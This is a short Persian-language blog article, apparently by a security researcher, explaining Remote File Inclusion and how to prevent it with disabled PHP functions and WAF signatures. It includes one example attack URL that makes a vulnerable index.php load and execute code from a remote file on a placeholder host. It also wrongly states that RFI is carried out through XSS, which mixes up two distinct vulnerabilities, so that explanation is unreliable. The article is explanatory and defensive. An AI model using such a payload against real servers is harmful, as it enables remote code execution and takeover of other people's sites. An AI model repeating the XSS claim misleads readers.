مقالات

Remote File Inclusion یا RFI چیست؟

images

Remote File Inclusion یا به اختصار RFI به هکرها اجازه می دهد تا به وسیله یک اسکریپت، اقدام به آپلود کد و فایلهای آلوده روی سرور کنند. این مورد در صورت وجود آسیب پذیری در سرور و یا وب سایت، به وسیله تزریق کد یا همان XSS انجام می گردد. در صورت وجود این آسیب پذیری، می تواند منجر به ارائه دسترسی Deface سایت، دسترسی اجرای دستورات و در نتیجه دسترسی shell گردد.

به طور مثال دستور زیر می تواند یک کد را از طریق URL در سرور اجرا نماید.

http://example.something/index.php?page=http://url/file.txt

توجه داشته باشید که کد مخرب در فایل متنی نوشته می شود. این مورد معمولا با غیر فعال نمودن توابع خطرناک php نظیر system و exec و … قابل پیشگیری است. ولی جهت امنیت بالاتر، می بایست از Signature های تشخیص حملات RFI در WAF های نرم افزاری/سخت افزاری استفاده نمود.

author-avatar

درباره میلاد خوشدل

کارشناسی رشته مهندسی نرم افزار و کارشناسی ارشد رشته ی معماری کامپیوتر 8 سال تجربه کاری در زمینه امنیت و تست نفوذ و در حال حاضر نیز به عنوان محقق امنیتی در یک شرکت معتبر داخلی مشغول به کار هستم.

نوشته های مشابه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

1 × پنج =